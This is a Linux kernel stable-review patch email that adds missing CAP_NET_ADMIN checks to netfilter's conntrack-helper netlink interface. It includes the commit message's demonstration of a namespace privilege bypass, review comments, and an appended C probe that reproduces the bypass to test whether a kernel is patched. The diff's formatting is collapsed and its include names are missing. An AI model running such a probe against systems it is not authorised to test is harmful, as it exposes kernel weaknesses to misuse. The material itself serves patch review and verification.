From: Greg Kroah-Hartman
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman, stable@vger.kernel.org, Kevin Cernekee, Pablo Neira Ayuso, Michal Kubecek
Subject: [PATCH 4.4 39/74] netfilter: nfnetlink_cthelper: Add missing permission checks
Date: Mon, 29 Jan 2018 13:56:44 +0100
Message-Id: <20180129123849.348697817@linuxfoundation.org>
X-Mailer: git-send-email 2.16.1
In-Reply-To: <20180129123847.507563674@linuxfoundation.org>
References: <20180129123847.507563674@linuxfoundation.org>
User-Agent: quilt/0.65
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-Mailing-List: linux-kernel@vger.kernel.org

4.4-stable review patch.  If anyone has any objections, please let me know.

------------------

From: Kevin Cernekee

commit 4b380c42f7d00a395feede754f0bc2292eebe6e5 upstream.

The capability check in nfnetlink_rcv() verifies that the caller has
CAP_NET_ADMIN in the namespace that "owns" the netlink socket. However,
nfnl_cthelper_list is shared by all net namespaces on the system. An
unprivileged user can create user and net namespaces in which he holds
CAP_NET_ADMIN to bypass the netlink_net_capable() check:

    $ nfct helper list
    nfct v1.4.4: netlink error: Operation not permitted

    $ vpnns -- nfct helper list
    {
            .name = ftp,
            .queuenum = 0,
            .l3protonum = 2,
            .l4protonum = 6,
            .priv_data_len = 24,
            .status = enabled,
    };

Add capable() checks in nfnetlink_cthelper, as this is cleaner than
trying to generalize the solution.

Signed-off-by: Kevin Cernekee
Signed-off-by: Pablo Neira Ayuso
Acked-by: Michal Kubecek
Signed-off-by: Greg Kroah-Hartman

---
 net/netfilter/nfnetlink_cthelper.c | 10 ++++++++++
 1 file changed, 10 insertions(+)

--- a/net/netfilter/nfnetlink_cthelper.c +++ b/net/netfilter/nfnetlink_cthelper.c @@ -17,6 +17,7 @@ #include #include #include +#include #include #include 
@@ -392,6 +393,9 @@ nfnl_cthelper_new(struct sock *nfnl, str struct nfnl_cthelper *nlcth; int ret = 0; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (!tb[NFCTH_NAME] || !tb[NFCTH_TUPLE]) return -EINVAL; @@ -595,6 +599,9 @@ nfnl_cthelper_get(struct sock *nfnl, str struct nfnl_cthelper *nlcth; bool tuple_set = false; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (nlh->nlmsg_flags & NLM_F_DUMP) { struct netlink_dump_control c = { .dump = nfnl_cthelper_dump_table, @@ -661,6 +668,9 @@ nfnl_cthelper_del(struct sock *nfnl, str struct nfnl_cthelper *nlcth, *n; int j = 0, ret; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (tb[NFCTH_NAME]) helper_name = nla_data(tb[NFCTH_NAME]);
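Review bot: the new capable(CAP_NET_ADMIN) test in nfnl_cthelper_new() carries no comment saying why it deliberately uses capable() instead of the netlink_net_capable() idiom that nfnetlink_rcv() already applies; the reason (nfnl_cthelper_list is one global list, so only CAP_NET_ADMIN in the initial user namespace is a meaningful gate) lives solely in the commit message. A one-line comment above the check, e.g. `/* helper list is global: require CAP_NET_ADMIN in init_user_ns */`, would keep a later namespace cleanup from converting it back to an ns-scoped check. The same remark applies to the identical checks in nfnl_cthelper_del() and nfnl_cthelper_get(). Note for the changelog that this also denies root inside a container (CAP_NET_ADMIN only in its own user namespace) from adding or removing helpers, which is the intended consequence of the list being global rather than a regression.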
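Review bot: in nfnl_cthelper_get() the check sits above the `if (nlh->nlmsg_flags & NLM_F_DUMP)` branch, which is the right place and worth preserving if the function is ever reshuffled: that branch services the request on its own through nfnl_cthelper_dump_table, so a check placed below it would never run for a dump, and `nfct helper list` in the commit message is exactly a dump. Of the three hunks this is the only one where a misplaced check would still leak the global list; the new/del paths have no comparable early exit before the attribute handling.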
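The bypass the commit message shows with `vpnns -- nfct helper list` (CAP_NET_ADMIN in a fresh user and net namespace satisfies netlink_net_capable(), while nfnl_cthelper_list is global) can be checked on a kernel without conntrack-tools. The following probe is an added example, not code from the patch, from Kevin Cernekee, or from the conntrack-tools project; it assumes a Linux host with the uapi netfilter headers installed, and the function names (build_cthelper_dump_req, build_error_reply, classify_reply) and PROBE_* result codes are its own.

```c
/* Added example (not code from the patch, its author or conntrack-tools):
 * probe whether nfnetlink_cthelper requires CAP_NET_ADMIN in the initial
 * user namespace. Reproduces "vpnns -- nfct helper list" with raw netlink:
 * unshare into a fresh user+net namespace, where an unprivileged user holds
 * CAP_NET_ADMIN and passes netlink_net_capable(), then dump the helper list.
 * Assumes Linux with the uapi netfilter headers. Build: cc -o probe probe.c */
#define _GNU_SOURCE
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nfnetlink_cthelper.h>

/* Result codes are this example's own naming. */
enum probe_result { PROBE_BYPASSED = 0, PROBE_ENFORCED = 1, PROBE_OTHER = -1 };

/* NFNL_SUBSYS_CTHELPER / NFNL_MSG_CTHELPER_GET with NLM_F_DUMP, the request
 * behind "nfct helper list". Returns the message length, 0 if buf is small. */
size_t build_cthelper_dump_req(unsigned char *buf, size_t buflen)
{
	size_t len = NLMSG_SPACE(sizeof(struct nfgenmsg));
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	struct nfgenmsg *nfg = (struct nfgenmsg *)(buf + NLMSG_HDRLEN);

	if (buflen < len)
		return 0;
	memset(buf, 0, len);
	nlh->nlmsg_len = (__u32)len;
	nlh->nlmsg_type = (NFNL_SUBSYS_CTHELPER << 8) | NFNL_MSG_CTHELPER_GET;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
	nlh->nlmsg_seq = 1;
	nfg->nfgen_family = AF_UNSPEC;
	nfg->version = NFNETLINK_V0;
	return len;
}

/* The NLMSG_ERROR message the kernel answers a rejected request with;
 * errnum is negative (-EPERM). Used to self-check classify_reply(). */
size_t build_error_reply(unsigned char *buf, size_t buflen, int errnum)
{
	size_t len = NLMSG_SPACE(sizeof(struct nlmsgerr));
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;

	if (buflen < len)
		return 0;
	memset(buf, 0, len);
	nlh->nlmsg_len = (__u32)len;
	nlh->nlmsg_type = NLMSG_ERROR;
	((struct nlmsgerr *)(buf + NLMSG_HDRLEN))->error = errnum;
	return len;
}

/* Classify the first message of the kernel's reply. */
int classify_reply(const unsigned char *buf, size_t len)
{
	const struct nlmsghdr *nlh = (const struct nlmsghdr *)buf;
	const struct nlmsgerr *e;

	if (len < (size_t)NLMSG_HDRLEN || nlh->nlmsg_len < (__u32)NLMSG_HDRLEN || nlh->nlmsg_len > len)
		return PROBE_OTHER;
	if (nlh->nlmsg_type != NLMSG_ERROR)
		return PROBE_BYPASSED; /* helper record or empty NLMSG_DONE: dump served */
	if (nlh->nlmsg_len < NLMSG_LENGTH(sizeof(*e)))
		return PROBE_OTHER;
	e = (const struct nlmsgerr *)(buf + NLMSG_HDRLEN);
	return e->error == -EPERM ? PROBE_ENFORCED : PROBE_OTHER;
}

int main(void)
{
	static const char *verdict[] = { "bypassed: helper list dumped from an unprivileged namespace",
					 "enforced: -EPERM, capable(CAP_NET_ADMIN) is checked" };
	unsigned char buf[8192];
	ssize_t n;
	int fd, r;

	/* A fresh user namespace grants this process every capability inside it,
	 * and the net namespace created with it is owned by that user namespace. */
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
		perror("unshare (unprivileged user namespaces disabled?)");
		return 2;
	}
	/* The socket lives in the new net namespace, so nfnetlink_rcv()'s
	 * netlink_net_capable(CAP_NET_ADMIN) check passes. */
	fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
	if (fd < 0 || send(fd, buf, build_cthelper_dump_req(buf, sizeof(buf)), 0) < 0 ||
	    (n = recv(fd, buf, sizeof(buf), 0)) < 0) {
		perror("netlink");
		return 2;
	}
	r = classify_reply(buf, (size_t)n);
	puts(r < 0 ? "inconclusive: other error (-EINVAL if no cthelper subsystem is loaded)" : verdict[r]);
	return r == PROBE_ENFORCED ? 0 : 1;
}
```

Run it as an unprivileged user on the kernel under test. An NLMSG_ERROR carrying -EPERM means the capable() checks from this patch are in place; a helper record or an empty NLMSG_DONE means the namespace-scoped check in nfnetlink_rcv() was the only gate. If unshare() itself fails with EPERM, unprivileged user namespaces are disabled on that host and the precondition for the bypass is absent anyway; any other errno (commonly -EINVAL when the cthelper subsystem is not registered) is inconclusive rather than a pass.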